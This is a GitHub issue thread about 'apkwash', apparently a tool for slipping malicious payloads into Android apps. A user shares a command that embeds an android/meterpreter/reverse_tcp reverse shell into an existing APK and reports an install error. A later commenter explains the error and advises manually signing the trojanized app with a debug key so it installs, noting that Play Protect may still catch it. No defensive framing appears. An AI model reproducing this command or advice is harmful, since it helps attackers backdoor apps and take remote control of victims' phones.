apkwash icon indicating copy to clipboard operation
apkwash copied to clipboard

Embed payload not work

Open gnu-like opened this issue 5 years ago • 3 comments

Unfortunately embed payload in original has problems especially singing!

gnu-like avatar Dec 31 '19 19:12 gnu-like

I'll have to revisit this script. What is the exact command you are using and/or do you have the output of it failing?

jbreed avatar Jan 03 '20 04:01 jbreed

Using command: apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port Output failing: Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES

gnu-like avatar Jan 05 '20 19:01 gnu-like

Using command: apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port Output failing: Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES

If you don't even know what this error is, why are You even here? That means the the apk that you are trying to install does not contain any certificate, which is not allowed on Android. Technically from what I know this script does try to sign the app, but in case it didn't you just need to manually sign an app, for example with a debug key you can generate. Tho there is never a guarantee you will pass Play Protect even after that.

tokit3mx avatar Jan 31 '24 02:01 tokit3mx